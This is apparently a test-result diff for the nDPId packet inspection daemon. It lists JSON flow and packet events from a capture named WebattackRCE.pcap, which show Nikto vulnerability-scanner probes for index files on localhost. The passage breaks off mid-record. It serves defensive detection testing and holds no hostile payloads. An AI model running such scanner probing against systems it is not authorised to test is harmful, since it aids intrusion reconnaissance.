+00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276801,"flow_last_seen":1576420276801,"flow_idle_time":7580000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":1,"thread_ts_msec":1576420276801,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49720,"dst_port":8080,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":90,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276803,"flow_last_seen":1576420276803,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276803,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49722,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":1,"flow_last_seen":1576420276803,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276803,"pkt":"AAAAAAAAAAAAAAAACABFAADGlY9AAEAGpqB\/AAABfwAAAcI6H5C5Ma2+n2Qvb4AYAED+ugAAAQEICp1m+2udZvtrR0VUIC9pbmRleC5waHAgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptdWx0aXBsZV9pbmRleCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
-01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276803,"flow_last_seen":1576420276803,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276803,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49722,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} +01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276803,"flow_last_seen":1576420276803,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276803,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49722,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/index.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":91,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276804,"flow_last_seen":1576420276804,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276804,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49724,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":1,"flow_last_seen":1576420276804,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276804,"pkt":"AAAAAAAAAAAAAAAACABFAADHUClAAEAG7AV\/AAABfwAAAcI8H5AXCWgXkPGhe4AYAED+uwAAAQEICp1m+2ydZvtsR0VUIC9pbmRleC5waHAzIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptdWx0aXBsZV9pbmRleCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276804,"flow_last_seen":1576420276804,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276804,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49724,"dst_port":8080,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php3","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276804,"flow_last_seen":1576420276804,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276804,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49724,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php3","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":92,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276806,"flow_last_seen":1576420276806,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276806,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49726,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":1,"flow_last_seen":1576420276806,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276806,"pkt":"AAAAAAAAAAAAAAAACABFAADHuG9AAEAGg79\/AAABfwAAAcI+H5DOCYBdLPnSzYAYAED+uwAAAQEICp1m+26dZvtuR0VUIC9pbmRleC5waHA0IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bXVsdGlwbGVfaW5kZXgpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":92,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276806,"flow_last_seen":1576420276806,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276806,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49726,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php4","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":92,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276806,"flow_last_seen":1576420276806,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276806,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49726,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php4","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":93,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276807,"flow_last_seen":1576420276807,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276807,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49728,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":1,"flow_last_seen":1576420276807,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276807,"pkt":"AAAAAAAAAAAAAAAACABFAADHnVlAAEAGntV\/AAABfwAAAcJAH5BrmKVmTh6XdYAYAED+uwAAAQEICp1m+2+dZvtvR0VUIC9pbmRleC5waHA1IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bXVsdGlwbGVfaW5kZXgpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":93,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276807,"flow_last_seen":1576420276807,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276807,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49728,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php5","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":93,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276807,"flow_last_seen":1576420276807,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276807,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49728,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php5","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":94,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276809,"flow_last_seen":1576420276809,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276809,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49730,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":94,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":1,"flow_last_seen":1576420276809,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276809,"pkt":"AAAAAAAAAAAAAAAACABFAADHz9VAAEAGbFl\/AAABfwAAAcJCH5Dtpvfi4owoVYAYAED+uwAAAQEICp1m+3GdZvtwR0VUIC9pbmRleC5waHA3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bXVsdGlwbGVfaW5kZXgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":94,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276809,"flow_last_seen":1576420276809,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276809,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49730,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php7","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":94,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276809,"flow_last_seen":1576420276809,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276809,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49730,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php7","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":95,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276810,"flow_last_seen":1576420276810,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276810,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49732,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":1,"flow_last_seen":1576420276810,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276810,"pkt":"AAAAAAAAAAAAAAAACABFAADH5lRAAEAGVdp\/AAABfwAAAcJEH5B9+95hKQN6FIAYAED+uwAAAQEICp1m+3KdZvtyR0VUIC9pbmRleC5odG1sIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptdWx0aXBsZV9pbmRleCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":95,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276810,"flow_last_seen":1576420276810,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276810,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49732,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.html","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":95,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276810,"flow_last_seen":1576420276810,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276810,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49732,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.html","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":96,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276812,"flow_last_seen":1576420276812,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276812,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49734,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":1576420276812,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276812,"pkt":"AAAAAAAAAAAAAAAACABFAADGlhlAAEAGphZ\/AAABfwAAAcJGH5DYta4lttm384AYAED+ugAAAQEICp1m+3OdZvtzR0VUIC9pbmRleC5odG0gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KDQo="} -01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":96,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276812,"flow_last_seen":1576420276812,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276812,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49734,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.htm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":96,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276812,"flow_last_seen":1576420276812,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276812,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49734,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.htm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":97,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276813,"flow_last_seen":1576420276813,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276813,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49736,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":1576420276813,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276813,"pkt":"AAAAAAAAAAAAAAAACABFAADI2h9AAEAGYg5\/AAABfwAAAcJIH5At6uIveFvtbIAYAED+vAAAAQEICp1m+3WdZvt1R0VUIC9pbmRleC5zaHRtbCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":97,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276813,"flow_last_seen":1576420276813,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276813,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49736,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 